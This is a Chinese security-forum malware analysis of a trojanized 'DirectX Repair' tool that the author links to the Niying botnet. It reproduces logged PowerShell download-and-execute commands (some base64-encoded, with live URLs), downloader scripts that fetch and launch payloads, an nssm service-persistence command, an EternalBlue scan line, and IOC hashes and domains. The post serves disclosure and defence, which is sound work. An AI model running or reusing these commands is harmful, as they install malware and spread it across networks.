查看: 2621|回复: 3
收起左侧

[分析报告] 疑似匿影僵尸网络最新活动

[复制链接]
wwwab
发表于 2022-5-30 19:06:56 | 显示全部楼层 |阅读模式
本帖最后由 wwwab 于 2022-5-30 20:18 编辑

一、 背景

近日,在帮助用户解决病毒问题时,发现用户中的是下载者木马。
其中一条日志内容为:

防护项目:利用PowerShell执行可疑脚本
执行文件:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
执行命令行:"powershell.exe" -NoP -NonI -ep bypass -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwB5AGUALgB5AGUAYQByAGkAZABwAGUAcgAuAGMAbwBtACcAKQApAA==
操作结果:已允许

进程ID:6504
操作进程:C:\Windows\nssm.exe
操作进程命令行:C:\Windows\nssm.exe
操作进程校验和:32559A80C27A69C15A1AAAD2B6AE7B893ECF69B1
父进程ID:1080
父进程:C:\Windows\System32\services.exe
父进程命令行:C:\Windows\system32\services.exe


操作系统目录竟然出现了nssm工具

将操作进程命令行进行base64解密即可得到:IEX ((new-object net.webclient).downloadstring('hxxp://ye.yearidper.com'))


通过查询威胁情报,寻找到一个类似的样本hxxp://win.yearidper.com/per.txt

继续研究安全日志,发现一条日志内容为:


防护项目:利用PowerShell执行可疑脚本
执行文件:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
执行命令行:powershell  "IEX (New-Object Net.WebClient).DownloadString('hxxp://cdn.comenbove.com/Ladon66.jpg'); Ladon 10.111.114.1/16 MS17010"
操作结果:已阻止

进程ID:18248
操作进程:C:\Windows\SysWOW64\cmd.exe
操作进程命令行:cmd.exe /c powershell "IEX (New-Object Net.WebClient).DownloadString('hxxp://cdn.comenbove.com/Ladon66.jpg'); Ladon 10.111.114.1/16 MS17010"
操作进程校验和:4048488DE6BA4BFEF9EDF103755519F1F762668F
父进程ID:13520
父进程:C:\Windows\SysWOW64\mmc.exe
父进程命令行:mmc.exe


将该URL下载后,发现其为PowerShell下载者木马。

再次查阅安全日志:


病毒名称:Trojan/Agent
病毒ID:A68B6378A5A9FBBE
病毒路径:C:\Users\Public\sharpwmi.exe
操作类型:修改
操作结果:已处理

进程ID:13520
操作进程:C:\Windows\SysWOW64\mmc.exe
操作进程命令行:mmc.exe
父进程:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe


发现病毒将部分文件保存至C:\Users\Public下,打开C:\Users\Public,发现多个永恒之蓝漏洞攻击程序和爆破攻击程序(pass.txt为密码字典,user.txt为用户名字典):


继续翻阅安全日志:


风险路径:C:\Windows\system32\WMIHACKER_0.6.vbs, 病毒名:Backdoor/VBS.WMIHacker.a, 病毒ID:a81b2725827b6a11, 处理结果:已处理,删除文件
风险路径:C:\Windows\SysWOW64\WMIHACKER_0.6.vbs, 病毒名:Backdoor/VBS.WMIHacker.a, 病毒ID:a81b2725827b6a11, 处理结果:已处理,删除文件


可发现病毒往系统目录塞了两个可疑vbs,文件名为WMIHACKER_0.6.vbs经过查询,WMIHACKER为内网横向渗透攻击工具。

询问用户后,用户称下载并运行了一个“dx修复工具”(DirectXRepair_4.1.0.30770_Online.rar)后出现相关症状。

二、追溯
(一)
通过hxxp://ye.yearidper.com,可查询到之前多人在多个论坛中此毒,如下图所示


(二)
1.
通过对hxxp://cdn.comenbove.com的威胁情报查询,发现了一个通信样本(9438183a93abc1f1dbb980b9de99bb8838267f6ca14cb33b1e29b42ebb8dfa97):



该样本伪装为Steam相关文件

PE文件信息:

文件说明:Steam
文件版本:2.10.91.91
产品名称:Steam
语言:0x0816 0x04e4
版权:© Valve Corporation

运行后,该样本会直接访问并下载hxxp://cdn.comenbove.com/shell.txt,内容为Powershell下载者木马:


(new-object System.Net.WebClient).DownloadFile( 'hxxp://cdn.comenbove.com/smbdown/Run.txt','C:\ProgramData\Run.txt')
(new-object System.Net.WebClient).DownloadFile( 'hxxp://cdn.comenbove.com/smbdown/cp.txt','C:\ProgramData\cp.exe')
(new-object System.Net.WebClient).DownloadFile( 'hxxp://cdn.comenbove.com/smbdown/msvcr120.txt','C:\ProgramData\msvcr120.dll')
(new-object System.Net.WebClient).DownloadFile( 'hxxp://cdn.comenbove.com/smbdown/abc.jpg','C:\ProgramData\abc.jpg')
Start-Process -FilePath C:\ProgramData\cp.exe C:\ProgramData\Run.txt


该样本同时会执行命令行:


powershell.exe -ep bypass -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA1AGQALgBiAGIAYQBjAHAAdQBtAG0AZAAuAGMAbABvAHUAZAAnACkAKQA=

base64解密后为:
IEX ((new-object net.webclient).downloadstring('hxxp://5d.bbacpummd.cloud'))

访问并下载hxxp://5d.bbacpummd.cloud,内容为:


(new-object System.Net.WebClient).DownloadFile( 'hxxp://cdn.comenbove.com/smbdown/Run.txt','C:\ProgramData\Run.txt')
(new-object System.Net.WebClient).DownloadFile( 'hxxp://cdn.comenbove.com/smbdown/cp.txt','C:\ProgramData\cp.exe')
(new-object System.Net.WebClient).DownloadFile( 'hxxp://cdn.comenbove.com/smbdown/msvcr120.txt','C:\ProgramData\msvcr120.dll')
(new-object System.Net.WebClient).DownloadFile( 'hxxp://cdn.comenbove.com/smbdown/abc.jpg','C:\ProgramData\abc.jpg')
Start-Process -FilePath C:\ProgramData\cp.exe C:\ProgramData\Run.txt

同时,我们发现,样本还会访问并下载http://5d.strongapt.ml当中的文件,但网站已挂,经过查询发现该域名曾被用于“匿影”僵尸网络投放此前的“WannaRen”勒索病毒(360发现,此前地址为hxxps://api.strongapt.ml/vmp2.jpg),奇安信也早已将多个通信域名标记为“HideShadowMiner”家族处理。




实锤为疑似“匿影”僵尸网络相关病毒样本。


2.
通过对hxxp://cdn.comenbove.com的威胁情报查询,又发现该服务器还有一个hxxp://cdn.comenbove.com/smb.jpg,如下图所示:



内容为:

$fileNames = Test-Path C:\ProgramData\smbx22.txt
$nic='True'
if($fileNames -ne $nic){
(new-object System.Net.WebClient).DownloadFile( 'https://www.upload.ee/files/14046702/1.txt.html','C:\ProgramData\smbx22.txt')

    }

(new-object System.Net.WebClient).DownloadFile( 'hxxp://cdn.comenbove.com/smbdown/Run.txt','C:\ProgramData\Run.txt')
(new-object System.Net.WebClient).DownloadFile( 'hxxp://cdn.comenbove.com/smbdown/cp.txt','C:\ProgramData\cp.exe')
(new-object System.Net.WebClient).DownloadFile( 'hxxp://cdn.comenbove.com/smbdown/msvcr120.txt','C:\ProgramData\msvcr120.dll')
(new-object System.Net.WebClient).DownloadFile( 'hxxp://cdn.comenbove.com/smbdown/abc.jpg','C:\ProgramData\abc.jpg')
Start-Process -FilePath C:\ProgramData\cp.exe C:\ProgramData\Run.txt


https://www.upload.ee/files/14046702/1.txt.html为0kb空白空文件)


三、对带毒DirectXRepair进行探究

文件名:DirectX Repair.exe

PE文件信息:


File Version Information:

Original Name:加入任务计划.exe
Internal Name:加入任务计划
File Version:1.0

文件运行后,会一边释放“dx修复工具”所需文件,一边释放nssm.exe至系统目录下:


Files Dropped:


%ProgramData%\DirectX Repair.exe
%windir%\nssm.exe

随后,便会命令行执行:


%windir%\nssm.exe install nssmsevr powershell.exe -NoP -NonI -ep bypass -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwB5AGUALgB5AGUAYQByAGkAZABwAGUAcgAuAGMAbwBtACcAKQApAA


(与“一、背景”一章当中为同一个Powershell命令,base64解密结果与第一章一致)

经过分析,样本会在%ProgramData%内释放正常使用“dx修复”功能所需的组件,而背后又在一边偷偷释放和执行%windir%\nssm.exe与cmd或Powershell下载者木马命令行,相关思维导图如下图所示:


四、价值意义


“匿影”僵尸网络曾投放“WannaRen”等勒索病毒,甚至有一部分用户中此病毒时同时中了勒索病毒(暂时无法确定其是否有关联),虽然暂未发现其他行为,但是对用户危害较大,其危害性不容小觑,用户发现告警后需及时处理。

五、Iocs

文件名病毒类型MD5
EternalBlue.ps1漏洞攻击程序17631532e3afc09eb8ccbe172adbd422
MS17010EXP.ps1漏洞攻击程序3d485260a28a458ec499a6951640f651
NoPSExec.exe黑客工具9a029b987b9a8df9613559dbe67969b5
sharpwmi.exe黑客工具8fdf897330a9c01776a4242d26089622
smbexec40.exe黑客工具23d02116f7489304bac069051636bcc8
WMIHACKER_0.6.vbs黑客工具ceb337687402e19efdf57264b2682d08
shellPowershell下载者f409c880cd868f743e30ac4b7db611fe
Ladon66.jpgPowershell下载者c8c04f28271812c48497f55e7d3d951f
smb.jpgPowershell下载者bbf56807db3e256d38aee5b3386f601a
Ladon.exe木马病毒2a871079cd6f8d845de0554a6ba29ddf
Asy.jpg木马病毒8a846340033c363af8efdbe4f865d2ad
Steam.exe木马病毒c1e7fc36f3a71f6dcb210b4f3127918d
DirectX Repair.exe木马病毒e5ec937968841a68872ac135039b3914

hxxp://ye.yearidper.com
hxxp://cdn.comenbove.com/Ladon66.jpg
hxxp://cdn.comenbove.com/shell.txt
hxxp://cdn.comenbove.com/smbdown/cp.txt
hxxp://cdn.comenbove.com/smbdown/abc.jpg
hxxp://cdn.comenbove.com/Asy.jpg
hxxp://cdn.comenbove.com/smb.jpg
hxxp://5d.bbacpummd.cloud/

*本文当中恶意链接均已做无害化处理(hxxp),base64代码可能会被防病毒软件检测到属正常现象网页不可被直接执行为了保证文章尽量完整暂时不做处理。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x

评分

参与人数 5分享 +3 人气 +11 收起 理由
ranqingl + 3 版区有你更精彩: )
屁颠屁颠 + 3 + 3 版区有你更精彩: )
huorong + 1 感谢提供分享
一只Lunda + 1 版区有你更精彩: )
Jirehlov1234 + 3

查看全部评分

Jirehlov1234
发表于 2022-5-30 21:56:32 | 显示全部楼层
Namecheap认为应该找hosting provider,他们不能直接干碎域名bbacpummd[.cloud

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
pal家族
发表于 2022-5-30 22:11:18 | 显示全部楼层
卡巴检测所有ioc
第二个号
发表于 2022-5-30 22:33:25 | 显示全部楼层
https://bbs.kafan.cn/thread-2233550-1-1.html
看了你这个帖子,我之前用win7可能就是中了这个勒索
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-12-23 02:09 , Processed in 0.133828 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表